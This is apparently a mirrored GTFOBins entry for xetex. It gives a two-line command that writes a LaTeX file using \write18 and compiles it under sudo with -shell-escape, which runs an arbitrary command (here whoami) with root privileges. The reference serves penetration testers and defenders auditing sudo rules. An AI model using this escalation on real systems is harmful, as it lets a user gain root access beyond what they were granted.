mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-12 23:12:06 +01:00
6 lines
224 B
Markdown
6 lines
224 B
Markdown
|
functions:
|
||
|
sudo:
|
||
|
- code: |
|
||
|
echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
|
||
|
sudo xetex -interaction=nonstopmode -shell-escape file.tex
|